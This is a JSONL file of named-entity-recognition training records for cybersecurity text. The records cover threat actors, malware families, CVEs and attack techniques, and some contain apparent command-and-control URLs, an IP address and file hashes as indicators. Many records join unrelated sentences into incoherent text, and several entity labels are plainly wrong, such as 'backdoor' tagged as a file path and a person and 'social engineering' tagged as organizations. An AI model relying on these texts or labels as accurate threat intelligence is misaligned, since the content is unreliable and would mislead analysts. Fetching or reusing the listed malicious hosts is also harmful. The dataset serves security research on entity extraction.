{"text": "This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . This powerful backdoor can receive commands from the attackers , enabling it to exfiltrate files from the system it is running on , execute additional scripts , delete files , and more .", "spans": {"MALWARE: sample": [[5, 11]], "MALWARE: Trochilus": [[31, 40]], "FILEPATH: backdoor": [[264, 272]]}, "info": {"id": "cyberner_stix_train_005391", "source": "cyberner_stix_train"}}
{"text": "Other variations of parking point the IP address to Google 's recursive name server 8.8.8.8 , an address belonging to Confluence , or to other non-routable addresses .", "spans": {"ORGANIZATION: Google": [[52, 58]]}, "info": {"id": "cyberner_stix_train_005392", "source": "cyberner_stix_train"}}
{"text": "This , in itself , does not prove that the perpetrators of the malware campaign are based in Russia , but it certainly sounds as if that is a strong possibility . The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect . validating a block comparison variable , The goal of this type of threat is often to shame or embarrass .", "spans": {"THREAT_ACTOR: Gallmaker": [[177, 186]], "TOOL: LotL": [[218, 222]], "TOOL: publicly available hack tools": [[235, 264]]}, "info": {"id": "cyberner_stix_train_005393", "source": "cyberner_stix_train"}}
{"text": "If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: hackers": [[50, 57]], "VULNERABILITY: exploit": [[241, 248]], "VULNERABILITY: CVE-2012-0158": [[249, 262]], "MALWARE: NetTraveler Trojan": [[274, 292]]}, "info": {"id": "cyberner_stix_train_005394", "source": "cyberner_stix_train"}}
{"text": "downloader , Newer version of SOURFACE , Sofacy .", "spans": {"MALWARE: SOURFACE": [[30, 38]], "MALWARE: Sofacy": [[41, 47]]}, "info": {"id": "cyberner_stix_train_005395", "source": "cyberner_stix_train"}}
{"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": {"MALWARE: AveMaria": [[10, 18]], "FILEPATH: documents": [[198, 207]], "VULNERABILITY: CVE-2012-0158": [[291, 304]], "TOOL: Microsoft Word": [[360, 374]], "VULNERABILITY: vulnerabilities": [[375, 390]]}, "info": {"id": "cyberner_stix_train_005396", "source": "cyberner_stix_train"}}
{"text": "Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 . The attackers actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": {"THREAT_ACTOR: threat groups": [[212, 225]], "THREAT_ACTOR: Oilrig1": [[236, 243]], "THREAT_ACTOR: CopyKittens2": [[248, 260]]}, "info": {"id": "cyberner_stix_train_005397", "source": "cyberner_stix_train"}}
{"text": "On the C2 panel , we found a potential link between Wolf Research and another Cyprus organization named Coralco Tech . LEAD and BARIUM are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time . The IXESHE attackers also used an exploit that affected Microsoft Excel — CVE-2009-3129 . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": {"ORGANIZATION: Wolf Research": [[52, 65]], "ORGANIZATION: Coralco Tech": [[104, 116]], "ORGANIZATION: SOC personnel": [[205, 218]], "THREAT_ACTOR: IXESHE": [[324, 330]], "ORGANIZATION: Microsoft": [[376, 385]], "TOOL: Excel": [[386, 391]], "VULNERABILITY: CVE-2009-3129": [[394, 407]], "MALWARE: SocGholish": [[489, 499]]}, "info": {"id": "cyberner_stix_train_005398", "source": "cyberner_stix_train"}}
{"text": "While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . By relying on a native PDF command to navigate to a new URL , Zirconium successfully circumvented Chrome 's anti-redirect protection .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[82, 95]], "VULNERABILITY: CVE-2016-7836": [[162, 175]]}, "info": {"id": "cyberner_stix_train_005399", "source": "cyberner_stix_train"}}
{"text": "Windows Defender ATP is also capable of detecting previously unknown attacks by monitoring system behavior indicative of hostile activity , including :", "spans": {"TOOL: Windows Defender ATP": [[0, 20]]}, "info": {"id": "cyberner_stix_train_005400", "source": "cyberner_stix_train"}}
{"text": "Group-IB has also detected recon emails sent out to New Zealand . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "MALWARE: recon emails": [[27, 39]], "MALWARE: ThreeDollars": [[103, 115]], "FILEPATH: preparation.dot": [[175, 190]]}, "info": {"id": "cyberner_stix_train_005401", "source": "cyberner_stix_train"}}
{"text": "BRONZE PRESIDENT installs PlugX using DLL side-loading .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "MALWARE: PlugX": [[26, 31]], "TOOL: DLL": [[38, 41]]}, "info": {"id": "cyberner_stix_train_005402", "source": "cyberner_stix_train"}}
{"text": "In addition to the look and feel of DroidVPN , this HenBox variant also contained a legitimate DroidVPN app within its APK package as an asset , which could be compared to a resource item within a Windows Portable Executable ( PE ) file . One government official puts it very matter-of-factly: Winnti is very specific to Germany . The new campaigns mark the first significant stirrings from the APT12 since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China .", "spans": {"MALWARE: HenBox": [[52, 58]], "SYSTEM: Windows Portable Executable": [[197, 224]], "THREAT_ACTOR: Winnti": [[294, 300]], "THREAT_ACTOR: APT12": [[395, 400]]}, "info": {"id": "cyberner_stix_train_005403", "source": "cyberner_stix_train"}}
{"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese Cyber Espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity .", "spans": {"MALWARE: China Chopper": [[4, 17]], "VULNERABILITY: CVE-2015-0062": [[146, 159]], "VULNERABILITY: CVE-2015-1701": [[162, 175]], "VULNERABILITY: CVE-2016-0099": [[180, 193]], "THREAT_ACTOR: attacker": [[207, 215]], "VULNERABILITY: CVE-2017-11882": [[284, 298]], "VULNERABILITY: CVE-2018-0802": [[303, 316]], "MALWARE: weaponizer": [[323, 333]], "THREAT_ACTOR: actors": [[382, 388]]}, "info": {"id": "cyberner_stix_train_005404", "source": "cyberner_stix_train"}}
{"text": "] site , and mms4you [ . Using a U.S.-based C2 infrastructure ( see Figure 7 ) to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense . S-SHA2init . 93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494 For example , in its 2020 Internet Crime Report released in March , the FBI confirmed the total cost of attacks reported to the bureau in 2020 amounted to 29.1 million , an increase of more than 200 from the year before .", "spans": {"TOOL: U.S.-based C2 infrastructure": [[33, 61]], "THREAT_ACTOR: TG-3390": [[119, 126]], "FILEPATH: S-SHA2init": [[205, 215]], "ORGANIZATION: FBI": [[355, 358]]}, "info": {"id": "cyberner_stix_train_005405", "source": "cyberner_stix_train"}}
{"text": "This ability is further demonstrated by analysis of interactions between TG-3390 operators and a target environment .", "spans": {"THREAT_ACTOR: TG-3390": [[73, 80]]}, "info": {"id": "cyberner_stix_train_005406", "source": "cyberner_stix_train"}}
{"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) .", "spans": {"MALWARE: email stealer": [[4, 17]], "ORGANIZATION: Kaspersky Lab": [[252, 265]], "TOOL: flash": [[348, 353]], "VULNERABILITY: exploit": [[354, 361]], "VULNERABILITY: CVE-2015-5119": [[364, 377]]}, "info": {"id": "cyberner_stix_train_005407", "source": "cyberner_stix_train"}}
{"text": "In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": {"VULNERABILITY: Scarlet Mimic exploit": [[103, 124]], "ORGANIZATION: CSIS": [[186, 190]], "MALWARE: Carbanak": [[224, 232]], "ORGANIZATION: customers": [[262, 271]]}, "info": {"id": "cyberner_stix_train_005408", "source": "cyberner_stix_train"}}
{"text": "At other times , Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years . The first 8 bytes of data are static . On June 27 , 2023 , at 18:51:57 UTC , Mandiant identified a malicious Ruby script executed via the JumpCloud agent at a downstream customer ( a software solutions entity ) .", "spans": {"MALWARE: Bread": [[17, 22]], "ORGANIZATION: users": [[195, 200]], "MALWARE: malicious Ruby script": [[327, 348]], "ORGANIZATION: JumpCloud agent": [[366, 381]], "ORGANIZATION: downstream customer": [[387, 406]], "ORGANIZATION: software solutions entity": [[411, 436]]}, "info": {"id": "cyberner_stix_train_005409", "source": "cyberner_stix_train"}}
{"text": "Figure 1 describes this infection process and the main behaviors of RuMMS . NEODYMIUM is an activity group that , like PROMETHIUM , conducted an attack campaign in early May 2016 . Basic Information on the “ .dot ” file are provided : The ransom note also makes reference to 3AM", "spans": {"MALWARE: RuMMS": [[68, 73]], "THREAT_ACTOR: NEODYMIUM": [[76, 85]], "THREAT_ACTOR: activity group": [[92, 106]], "THREAT_ACTOR: PROMETHIUM": [[119, 129]], "FILEPATH: .dot": [[208, 212]], "MALWARE: 3AM": [[274, 277]]}, "info": {"id": "cyberner_stix_train_005410", "source": "cyberner_stix_train"}}
{"text": "Figure 10 : The algorithm of the malicious update , while “ Agent Smith ” updates application If all that has failed , “ Agent Smith ” turns to Man-in-the-Disk vulnerability for ‘ SHAREit ’ or ‘ Xender ’ applications . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator . The decrypted data contains three executables . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": {"MALWARE: Agent Smith": [[60, 71], [121, 132]], "VULNERABILITY: Man-in-the-Disk": [[144, 159]], "SYSTEM: SHAREit": [[180, 187]], "SYSTEM: Xender": [[195, 201]], "MALWARE: kontrakt87.doc": [[247, 261]], "ORGANIZATION: telecommunications service": [[283, 309]], "ORGANIZATION: MegaFon": [[324, 331]], "ORGANIZATION: mobile phone operator": [[350, 371]], "SYSTEM: a URL shortcut": [[520, 534]]}, "info": {"id": "cyberner_stix_train_005411", "source": "cyberner_stix_train"}}
{"text": "Like Vcrodat , Nibatad is also a loader that leverages search order hijacking , and downloads an encrypted payload to the infected computer . The other overlapping files are tools used by the adversary to locate other systems on the network ( etool.exe ) , check to see if they are vulnerable to CVE-2017-0144 ( EternalBlue ) patched in MS07-010 ( checker1.exe ) and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket ( psexec.exe ) .", "spans": {"TOOL: Vcrodat": [[5, 12]], "TOOL: Nibatad": [[15, 22]], "FILEPATH: etool.exe": [[243, 252]], "VULNERABILITY: CVE-2017-0144": [[296, 309]], "VULNERABILITY: EternalBlue": [[312, 323]], "FILEPATH: MS07-010": [[337, 345]], "FILEPATH: checker1.exe": [[348, 360]], "TOOL: PsExec": [[447, 453]], "TOOL: Impacket": [[465, 473]], "FILEPATH: psexec.exe": [[476, 486]]}, "info": {"id": "cyberner_stix_train_005412", "source": "cyberner_stix_train"}}
{"text": "'' The latest samples attributed to this campaign were discovered by security researchers from ClearSky . Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY . The second payload , downloaded via the DownloadData method , is a Ursnif executable . Additional investigation will reveal more about the goals of Charming Kitten regarding the medical sector .", "spans": {"ORGANIZATION: ClearSky": [[95, 103]], "ORGANIZATION: Mandiant": [[106, 114]], "THREAT_ACTOR: APT29": [[128, 133]], "TOOL: POSHSPY": [[173, 180]], "TOOL: DownloadData": [[223, 235]], "MALWARE: Ursnif": [[250, 256]], "THREAT_ACTOR: Charming Kitten": [[331, 346]], "ORGANIZATION: medical sector": [[361, 375]]}, "info": {"id": "cyberner_stix_train_005413", "source": "cyberner_stix_train"}}
{"text": "The information gathered from these engagements , combined with information from prior Dridex IR engagements , provides insight into how INDRIK SPIDER deploys and operates both Dridex and BitPaymer . We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester .", "spans": {"TOOL: Dridex IR": [[87, 96]], "THREAT_ACTOR: INDRIK SPIDER": [[137, 150]], "TOOL: Dridex": [[177, 183]], "TOOL: BitPaymer": [[188, 197]], "MALWARE: malware": [[248, 255]], "FILEPATH: Bluetooth device harvester": [[289, 315]]}, "info": {"id": "cyberner_stix_train_005414", "source": "cyberner_stix_train"}}
{"text": "] 208 attiva.exodus.esurv [ . My understanding is FireEye labels entities where definitive attribution is not yet possible with the \" TEMP \" moniker ( hence , TEMP.Veles ) – yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting . in the Middle East since 2012 . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": {"ORGANIZATION: FireEye": [[50, 57], [191, 198]], "THREAT_ACTOR: TEMP.Veles": [[159, 169]], "ORGANIZATION: Harrison": [[350, 358]]}, "info": {"id": "cyberner_stix_train_005415", "source": "cyberner_stix_train"}}
{"text": "The above code allows DealersChoice to load a second SWF object , specifically loading it with an argument that includes a C2 URL of “ http://ndpmedia24.com/0pq6m4f.m3u8 ” .", "spans": {"TOOL: DealersChoice": [[22, 35]], "TOOL: SWF": [[53, 56]], "TOOL: C2": [[123, 125]], "URL: http://ndpmedia24.com/0pq6m4f.m3u8": [[135, 169]]}, "info": {"id": "cyberner_stix_train_005416", "source": "cyberner_stix_train"}}
{"text": "network.exe submitting to the server code snippet Code similarities We found some code similarities between the implant for Windows and other public accessible projects . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . Machete : El Machete .", "spans": {"SYSTEM: Windows": [[124, 131]], "MALWARE: SWAnalytics": [[196, 207]], "THREAT_ACTOR: Machete": [[280, 287]], "THREAT_ACTOR: El Machete": [[290, 300]]}, "info": {"id": "cyberner_stix_train_005417", "source": "cyberner_stix_train"}}
{"text": "For example , it could be used to display unwanted and annoying advertisements on a device , or potentially , to download and deploy a payload that steals credentials from an infected device . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B .", "spans": {"THREAT_ACTOR: group": [[197, 202]], "ORGANIZATION: specific individuals": [[276, 296]], "VULNERABILITY: zero-day exploits": [[337, 354]], "THREAT_ACTOR: APT10": [[439, 444]], "MALWARE: mimikatz": [[496, 504]], "MALWARE: PwDump": [[508, 514]], "MALWARE: DLL load order hijacking": [[533, 557]]}, "info": {"id": "cyberner_stix_train_005418", "source": "cyberner_stix_train"}}
{"text": "Most recently , the ransomware known as Ryuk came to market in August 2017 and has netted its operators , tracked by Falcon Intelligence as GRIM SPIDER , a significant ( and immediate ) profit in campaigns also targeting large organizations . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": {"TOOL: ransomware": [[20, 30]], "TOOL: Ryuk": [[40, 44]], "ORGANIZATION: Falcon Intelligence": [[117, 136]], "THREAT_ACTOR: GRIM SPIDER": [[140, 151]], "TOOL: emails": [[272, 278]], "ORGANIZATION: bank employees": [[297, 311]]}, "info": {"id": "cyberner_stix_train_005419", "source": "cyberner_stix_train"}}
{"text": "The message translates roughly to “ You got a photo in MMS format : hxxp : //yyyyyyyy.XXXX.ru/mms.apk. ” So far we identified seven different URLs being used to spread RuMMS in the wild . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information . The fact that the “ 28847.exe ” file can be opened makes us understand that the “ 28847 ” file is another SFX file . LotLBin techniques also make it difficult for defenders to detect threat activity as they need to not only remain vigilant for new files introduced to their environments , but also for modifications to files already present within their installed OT applications and services .", "spans": {"MALWARE: RuMMS": [[168, 173]], "THREAT_ACTOR: Attackers": [[188, 197]], "ORGANIZATION: oil": [[382, 385]], "ORGANIZATION: gas": [[388, 391]], "ORGANIZATION: petrochemical companies": [[398, 421]], "ORGANIZATION: executives": [[451, 461]], "FILEPATH: 28847.exe": [[599, 608]], "FILEPATH: 28847": [[660, 665]], "TOOL: SFX": [[683, 686]], "THREAT_ACTOR: LotLBin techniques": [[693, 711]], "SYSTEM: OT applications": [[940, 955]]}, "info": {"id": "cyberner_stix_train_005420", "source": "cyberner_stix_train"}}
{"text": "There was no activity from the group on weekends .", "spans": {}, "info": {"id": "cyberner_stix_train_005421", "source": "cyberner_stix_train"}}
{"text": "FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany , Japan , and the U.S until Oct. 24 at 15:00 UTC , when the infection attempts ceased and attacker infrastructure – both 1dnscontrol.com and the legitimate websites containing the rogue code – were taken offline . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: attacker": [[186, 194]], "THREAT_ACTOR: APT32": [[337, 342]], "TOOL: emails": [[372, 378]], "FILEPATH: Microsoft ActiveMime file": [[384, 409]]}, "info": {"id": "cyberner_stix_train_005422", "source": "cyberner_stix_train"}}
{"text": "[ True/False ] Signal strength Screen active [ True/False ] Orientation Was accessibility permission granted ? In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region .", "spans": {"THREAT_ACTOR: group": [[134, 139]], "TOOL: powershell-based malware": [[168, 192]], "ORGANIZATION: social engineering": [[204, 222]], "ORGANIZATION: FireEye 's DTI": [[351, 365]], "TOOL: emails": [[387, 393]], "FILEPATH: malicious attachments": [[405, 426]], "ORGANIZATION: banks": [[450, 455]]}, "info": {"id": "cyberner_stix_train_005423", "source": "cyberner_stix_train"}}
{"text": "This question of perception and accuracy rests upon the underlying epistemic framework and the goal conceived for that framework in defining an adversary : FireEye ’s methodology follows a deductive approach requiring the collection of significant evidence over time to yield a conclusion that will be necessary given the premises ( the totality of evidence suggests APTxx ) ; the Dragos approach instead seeks an inductive approach , where premises may all be true but the conclusion need not necessarily follow from them given changes in premises over time or other observations not contained within the set ( thus , identified behaviors strongly suggests an activity group , defined as X ) .", "spans": {"ORGANIZATION: FireEye": [[156, 163]], "ORGANIZATION: Dragos": [[381, 387]]}, "info": {"id": "cyberner_stix_train_005424", "source": "cyberner_stix_train"}}
{"text": "The module also reads the contents of the file “ %APPDATA%\\chkdbg.log ” and appends it to the results .", "spans": {"FILEPATH: %APPDATA%\\chkdbg.log": [[49, 69]]}, "info": {"id": "cyberner_stix_train_005425", "source": "cyberner_stix_train"}}
{"text": "Latest version ( 2018 ) Let ’ s now return to the present day and a detailed description of the functionality of a current representative of the Rotexy family ( SHA256 : ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84 ) . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . In May 2017 , SecureWorks® Counter Threat Unit® ( CTU ) researchers investigated a widespread and opportunistic WCry ( also known as WanaCry , WanaCrypt , and Wana Decrypt0r ) ransomware campaign that impacted many systems around the world .", "spans": {"MALWARE: Rotexy": [[145, 151]], "MALWARE: ChopShop1": [[239, 248]], "ORGANIZATION: MITRE Corporation": [[285, 302]], "ORGANIZATION: SecureWorks® Counter Threat Unit®": [[468, 501]], "ORGANIZATION: CTU": [[504, 507]], "MALWARE: WCry": [[566, 570]], "MALWARE: WanaCry": [[587, 594]], "MALWARE: WanaCrypt": [[597, 606]], "MALWARE: Wana Decrypt0r": [[613, 627]]}, "info": {"id": "cyberner_stix_train_005426", "source": "cyberner_stix_train"}}
{"text": "Each value represents a different type of data to steal from the device : Value Data Type 1 Accounts 2 Installed APP list 3 Running processes list 4 Battery status 5 Browser bookmarks and histories 6 Call logs 7 Clipboard 8 Contacts 9 Mobile operator information a File list on SD card b Location c Image list d Audio list e Video list f Storage and memory information g Connection information h Sensors information i SMS messages j VCard format contacts Table 1 . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . This module mainly relies on WMI and Windows objects to deliver results , which will be sent back to the operators . There are a few reasons why attackers may opt to pay for an as - a - service malware tool for their chosen campaign : • As - a - service saves attackers time .", "spans": {"TOOL: WMI": [[611, 614]], "SYSTEM: Windows": [[619, 626]], "THREAT_ACTOR: attackers": [[727, 736]], "TOOL: an as - a - service malware tool": [[756, 788]]}, "info": {"id": "cyberner_stix_train_005427", "source": "cyberner_stix_train"}}
{"text": "Suckfly targeted one of India ’s largest e-commerce companies , a major Indian shipping company , one of India ’s largest financial organizations , and an IT firm that provides support for India ’s largest stock exchange .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_005428", "source": "cyberner_stix_train"}}
{"text": "http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm http://109.248.148.42/officeDocument/2006/relationships/templates.dotm .", "spans": {"URL: http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm": [[0, 68]], "URL: http://109.248.148.42/officeDocument/2006/relationships/templates.dotm": [[69, 139]]}, "info": {"id": "cyberner_stix_train_005429", "source": "cyberner_stix_train"}}
{"text": "Details of the first wave , including a thorough technical analysis of CloudDuke , was published by Palo Alto Networks on 14th July .", "spans": {"MALWARE: CloudDuke": [[71, 80]], "ORGANIZATION: Palo Alto Networks": [[100, 118]]}, "info": {"id": "cyberner_stix_train_005430", "source": "cyberner_stix_train"}}
{"text": "Moreover , incoming traffic from the C & C server began to use gzip compression , and the top-level domain for all C & Cs was .com : Since December 2016 , the changes in C & C communication methods have affected only how the relative path in the URL is generated : the pronounceable word was replaced by a rather long random combination of letters and numbers , for example , “ ozvi4malen7dwdh ” or “ f29u8oi77024clufhw1u5ws62 ” . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China . The attackers could hide their activities if they noted the business hours of the intended targets and performed the actions coinciding with said times . Ashley Madison ’s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison ’s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": {"TOOL: SWC": [[435, 438]], "ORGANIZATION: Uyghur ethnic group": [[498, 517]], "ORGANIZATION: Muslim minority group": [[522, 543]], "ORGANIZATION: Ashley Madison": [[748, 762]], "ORGANIZATION: Maggie McNeill": [[900, 914]], "SYSTEM: Ashley Madison ’s internal systems": [[959, 993]], "ORGANIZATION: female accounts": [[1036, 1051]]}, "info": {"id": "cyberner_stix_train_005431", "source": "cyberner_stix_train"}}
{"text": "We will continue to observe the group ’s activities as they target industries from the United States and Europe .", "spans": {}, "info": {"id": "cyberner_stix_train_005432", "source": "cyberner_stix_train"}}
{"text": "As mentioned in the Hermes to Ryuk section , Ryuk uses a combination of symmetric ( AES ) and asymmetric ( RSA ) encryption to encrypt files . Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateACT .", "spans": {"TOOL: Hermes": [[20, 26]], "TOOL: Ryuk": [[30, 34], [45, 49]], "TOOL: AES": [[84, 87]], "TOOL: RSA": [[107, 110]], "MALWARE: RAR": [[209, 212]]}, "info": {"id": "cyberner_stix_train_005433", "source": "cyberner_stix_train"}}
{"text": "We ’ ve documented several interesting attacks ( A Gift for Dalai Lamas Birthday and Cyber Attacks Against Uyghur Mac OS X Users Intensify ) which used ZIP files as well as DOC , XLS and PDF documents rigged with exploits . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal , Thailand , Laos and China .", "spans": {"SYSTEM: Mac OS X": [[114, 122]], "TOOL: POWRUNER": [[224, 232]], "MALWARE: RTF file": [[265, 273]], "VULNERABILITY: CVE-2017-0199": [[289, 302]], "THREAT_ACTOR: attackers": [[309, 318]], "ORGANIZATION: government agencies": [[381, 400]], "ORGANIZATION: civil and military organizations": [[405, 437]]}, "info": {"id": "cyberner_stix_train_005434", "source": "cyberner_stix_train"}}
{"text": "COZY BEAR ’s preferred intrusion method is a broadly targeted spearphish campaign that typically includes web links to a malicious dropper .", "spans": {"THREAT_ACTOR: COZY BEAR": [[0, 9]]}, "info": {"id": "cyberner_stix_train_005435", "source": "cyberner_stix_train"}}
{"text": "com.bbt.cmol com.sovereign.santander com.mtb.mbanking.sc.retail.prod com.fi9293.godough com.commbank.netbank org.westpac.bank org.stgeorge.bank au.com.nab.mobile au.com.bankwest.mobile au.com.ingdirect.android org.banksa.bank com.anz.android com.anz.android.gomoney com.citibank.mobile.au org.bom.bank com.latuabancaperandroid In addition to stealing keystrokes , Naikon also intercepted network traffic . Rancor : 199.247.6.253 . Note : The default log rotation configuration on NetScaler allows 25 files per log type ( e.g. , ns.log ) and 100 Kilobytes per log , therefore recording 2.5 megabytes in total .", "spans": {"THREAT_ACTOR: Naikon": [[364, 370]], "THREAT_ACTOR: Rancor": [[406, 412]], "IP_ADDRESS: 199.247.6.253": [[415, 428]]}, "info": {"id": "cyberner_stix_train_005437", "source": "cyberner_stix_train"}}
{"text": "force the device ’ s back to the home screen getnpki : get files/content from the folder named NPKI ( contains certificates related to financial transactions ) http — access a specified network using HttpURLConnection onRecordAction — simulate a number-dialed tone call — call a specified number get_apps — get all the apps installed on the device show_fs_float_window — show a full-screen window for phishing Of note is XLoader ’ s abuse of the WebSocket protocol ( supported in many browsers Following US-CERTs report , Symantec's research uncovered the key component used in Lazarus's recent wave of financial attacks . Also , some code pieces are directly re-used in the", "spans": {"MALWARE: XLoader": [[421, 428]], "THREAT_ACTOR: Lazarus's": [[578, 587]], "ORGANIZATION: financial": [[603, 612]]}, "info": {"id": "cyberner_stix_train_005438", "source": "cyberner_stix_train"}}
{"text": "There have been cases in the past where victims also downloaded malicious content from fake news websites .", "spans": {}, "info": {"id": "cyberner_stix_train_005439", "source": "cyberner_stix_train"}}
{"text": "Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization .", "spans": {"THREAT_ACTOR: ‘Operation Sheep’": [[7, 24]], "VULNERABILITY: Man-in-the-Disk": [[123, 138]], "FILEPATH: installed EXE file": [[210, 228]], "TOOL: DLL": [[263, 266]], "FILEPATH: Bisonal variant": [[278, 293]]}, "info": {"id": "cyberner_stix_train_005440", "source": "cyberner_stix_train"}}
{"text": "] infoal-amalhumandevelopment [ . In addition to the original \" Infy \" variant , we also see the newer , more sophisticated , interactive , and fuller-featured \" Infy M \" variant deployed against apparently-higher-value targets . The Domain Name System ( DNS ) is the phone book of the Internet . and % HiddenKey% as part of its persistence via the Windows registry.[6 ] OSX / Shlayer has used the mktemp utility to make random and unique filenames for payloads , such as export tmpDir=\"$(mktemp -d /tmp / XXXXXXXXXXXX ) \" or mktemp -t Installer .", "spans": {"TOOL: Infy": [[64, 68]], "TOOL: Infy M": [[162, 168]], "TOOL: OSX / Shlayer": [[371, 384]]}, "info": {"id": "cyberner_stix_train_005441", "source": "cyberner_stix_train"}}
{"text": "Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments . Only one client , based in Iran , continued to communicate with the infrastructure .", "spans": {"THREAT_ACTOR: APT32": [[22, 27]], "THREAT_ACTOR: OceanLotus Group": [[48, 64]], "ORGANIZATION: foreign corporations": [[80, 100]], "ORGANIZATION: governments": [[109, 120]]}, "info": {"id": "cyberner_stix_train_005442", "source": "cyberner_stix_train"}}
{"text": "If users allow such apps to be installed , then it can be actively installed on the victim ’ s device . The simplest conclusion based on these facts is that APT1 is operating in China , and most likely in Shanghai . However, a variety of typical persistence mechanisms, such as a scheduled task, could serve that . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": {"THREAT_ACTOR: APT1": [[157, 161]], "THREAT_ACTOR: CrowdStrike researchers": [[315, 338]], "VULNERABILITY: KB5019758": [[446, 455]]}, "info": {"id": "cyberner_stix_train_005443", "source": "cyberner_stix_train"}}
